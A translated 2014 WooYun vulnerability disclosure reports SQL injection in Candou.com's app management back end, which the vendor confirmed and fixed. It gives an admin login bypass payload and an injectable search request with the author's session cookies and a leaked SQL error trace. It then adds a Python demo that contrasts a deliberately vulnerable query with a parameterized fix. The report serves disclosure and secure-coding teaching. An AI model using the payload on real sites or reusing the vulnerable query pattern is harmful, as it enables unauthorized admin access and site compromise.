
Defect ID: wooyun-2014-070727

Title: SQL injection in the 蚕豆网 (Candou.com) app management back end can lead to site-wide malware planting (挂马)

Vendor: 蚕豆网 (Candou.com)

Author: mango

Submitted: 2014-08-02 14:23

Fixed: 2014-09-16 14:24

Published: 2014-09-16 14:24

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2014-08-02: Details sent to the vendor, awaiting vendor action
2014-08-05: Vendor confirmed; details disclosed to the vendor only
2014-08-15: Details disclosed to core white hats and domain experts
2014-08-25: Details disclosed to regular white hats
2014-09-04: Details disclosed to intern white hats
2014-09-16: Details disclosed to the public

Brief description:

Details:

http://appgame.candou.com
admin' or '1'='1
admin' or '1'='1
Goes straight into the back end.



If I just edit or add a game or whatever ~~ you know, plant malware and so on... basically all of your site-wide privileges are right here.

Proof:

There is another injection in the back end as well

POST /iphone/home/search HTTP/1.1
Host: appgame.candou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
DontTrackMeHere: gzip, deflate
Referer: http://appgame.candou.com/iphone/home/search
Cookie: FBMD_af83_saltkey=LVYbgnY1; FBMD_af83_lastvisit=1406952229; FBMD_af83_sid=UO1Z31; FBMD_af83_lastact=1406959118%09user.php%09; FBMD_af83_st_p=0%7C1406955874%7Cf8aca706683ba6cfbc79f2fffe4753c9; FBMD_af83_visitedfid=49; FBMD_af83_viewid=tid_10100; FBMD_af83_home_diymode=1; FBMD_af83_ulastactivity=e864H98QCz%2Faky5%2Bn952RcOf2CNnIpaKn%2B%2Fv6zjMaWK%2B9et2JkSk; FBMD_af83_auth=20aeDXDgSiV%2FtMoaTnTTRdoWlgwu2WqQwck2aUkgzlOESyH3nOtzvLDuwDUx2O%2FstFVgvVlYRrYGpKrsLMLsYO4; FBMD_af83_lastcheckfeed=194%7C1406956137; FBMD_af83_lip=61.232.3.8%2C1406958708; FBMD_af83_security_cookiereport=29fdKRVVmcDsO6u2JmCONR%2BWCR5foOYR6u29EQkRFPk2j16EDJrI; FBMD_af83_sina_bind_194=-1; c85272602367782310589=4350V66KbTH1537G0HclPaGnqFpPyBrycQqQ7hnGvkG%2BwGFYcW3dc86tRFexfrB5AUFEs8VsfCyiqGJbISMd0Nn8GO9UqmDCSNRc1Oym3QJ6wA8zR5MwY3hKKjedsYBkKYiI1FTUultqO5CqVtQWm9AROnI2BHSiiAR6ZPpvmmp1xmLRWYjqTsgemVWSLZcIECCKS4UH76h72wCqqaT32IeX3EjM3UCnf7V5I%2BN6ofTGvBMznTw%2BLVVsQD0TVOpJBLN5mUWxEl%2FP69H33f5g0eksxwY0jOfLIHBXC56lARDEjxTwSWuf170ZvSY39HbrL5Elom0NnvyUvV5%2BnJ1mXXJpeWBLOagj41AsoVGHwyH%2Fjbvuj3OALKPk%2BHxUhaVf%2BV1BdP8ssQGf0hNIJLWk4Uz2wer5vshTwVJxfZDVp%2FbE6PhZKhnfk1n3C7q4GOIERbZoVlNJPQu0oKQVYM0kDlLrwT%2BhDSr3H6Y8SyIz9m3L1DUgWwAnfH2BCnBaXOufhc5r0DgHtZYH3IrLxUB%2FWRPGkR%2BTjqzjit0j9VwIHbCYgxmRd0KBHK8fFQhXJ0JwsxWmu1W3HlGD; FBMD_af83_connect_is_bind=1; FBMD_af83_nofavfid=1; FBMD_af83_checkupgrade=1; PHPSESSID=jijeolqm8helfu24eoog3fidl1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
at=id&search=#


HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Sat, 02 Aug 2014 06:06:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.5.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2805
<pre><br>object(Sow\sys\Exception)#15 (8) {
["string":"Exception":private]=>
string(0) ""
["file":protected]=>
string(25) "/web/lib/Sow/mysql/db.php"
["line":protected]=>
int(287)
["trace":"Exception":private]=>
array(6) {
[0]=>
array(6) {
["file"]=>
string(25) "/web/lib/Sow/mysql/db.php"
["line"]=>
int(89)
["function"]=>
string(15) "_throwException"
["class"]=>
string(12) "Sow\mysql\db"
["type"]=>
string(2) "->"
["args"]=>
array(0) {
}
}
[1]=>
array(6) {
["file"]=>
string(39) "/web/site/appgame/www/models/Iphone.php"
["line"]=>
int(203)
["function"]=>
string(5) "query"
["class"]=>
string(12) "Sow\mysql\db"
["type"]=>
string(2) "->"
["args"]=>
array(1) {
[0]=>
string(297) "select `application_id` AS 'AppID', `alias`AS 'AppName',`current_version` AS 'AppVersion' ,`category_id` AS 'AppCategory',`downloads` AS 'AppDownloadCount', `release_date` as 'AppUpdateTime', `display_order2` as 'DisplayOrder' FROM `tb_application` where `status`='publish' and `application_id`=#"
}
}
[2]=>
array(6) {
["file"]=>
string(57) "/web/site/appgame/www/modules/Iphone/controllers/Home.php"
["line"]=>
int(241)
["function"]=>
string(6) "search"
["class"]=>
string(12) "Iphone_Model"
["type"]=>
string(2) "::"
["args"]=>
array(4) {
[0]=>
string(2) "id"
[1]=>
string(1) "#"
[2]=>
string(1) "1"
[3]=>
string(2) "15"
}
}
[3]=>
array(4) {
["function"]=>
string(12) "searchAction"
["class"]=>
string(15) "Home_Controller"
["type"]=>
string(2) "->"
["args"]=>
array(0) {
}
}
[4]=>
array(6) {
["file"]=>
string(20) "/web/lib/Sow/bug.php"
["line"]=>
int(122)
["function"]=>
string(3) "run"
["class"]=>
string(15) "Yaf\Application"
["type"]=>
string(2) "->"
["args"]=>
array(0) {
}
}
[5]=>
array(6) {
["file"]=>
string(31) "/web/site/appgame/www/index.php"
["line"]=>
int(20)
["function"]=>
string(4) "http"
["class"]=>
string(7) "Sow\bug"
["type"]=>
string(2) "::"
["args"]=>
array(0) {
}
}
}
["message":protected]=>
string(146) "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"
["code":protected]=>
int(1064)
["previous":protected]=>
NULL
["previous":"Exception":private]=>
NULL
}
<hr></pre>
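The trace above shows the failing query with the raw `search` value pasted into `application_id`=#`, which is why a single `#` produces a MySQL 1064 syntax error. The following is an added example (not the site's code) that reproduces that pattern and its fix in Python over an in-memory SQLite table: the `tb_application` rows, the `name` search field and the `raises` helper are constructed for the demonstration, and the column names come from the query in the trace.

```python
import sqlite3

# Constructed sample rows standing in for tb_application (not real data).
ROWS = [
    (1, "Game A", "publish"),
    (2, "Game B", "publish"),
    (3, "Game C", "draft"),
]

# The `at` request parameter picks the column to search on. The trace shows
# at=id mapping to application_id; "name" is an assumed second option.
ALLOWED_COLUMNS = {"id": "application_id", "name": "alias"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_application "
                 "(application_id INTEGER, alias TEXT, status TEXT)")
    conn.executemany("INSERT INTO tb_application VALUES (?, ?, ?)", ROWS)
    return conn


def search_vulnerable(conn, at, value):
    # Mirrors the failing query from the trace: the search value is spliced
    # into the SQL text, so '#' is a syntax error and '1 or 1=1' rewrites the
    # WHERE clause (dropping the status='publish' filter as well).
    column = "application_id" if at == "id" else at
    sql = ("select application_id, alias from tb_application "
           f"where status='publish' and {column}={value}")
    return conn.execute(sql).fetchall()


def search_safe(conn, at, value):
    # Column name comes from an allowlist; the value is a bound parameter and
    # cannot alter the statement's structure, whatever it contains.
    column = ALLOWED_COLUMNS.get(at)
    if column is None:
        raise ValueError(f"unsupported search field: {at!r}")
    sql = ("select application_id, alias from tb_application "
           f"where status='publish' and {column}=?")
    return conn.execute(sql, (value,)).fetchall()


def raises(fn, *args):
    """Return the class name of the exception fn(*args) raises, or None."""
    try:
        fn(*args)
    except Exception as exc:  # demonstration helper only
        return type(exc).__name__
    return None
```

The safe variant treats `#` or `1 or 1=1` as a literal value that matches nothing, and rejects an unknown `at` field before any SQL is built; in the site's PHP the equivalent is a prepared statement with a column allowlist.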

Fix recommendation:

Copyright: please credit the source when reposting: mango@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2014-08-05 16:36

Vendor reply:

Thanks, already handled; the legacy system has multiple vulnerabilities!

Latest status:

None yet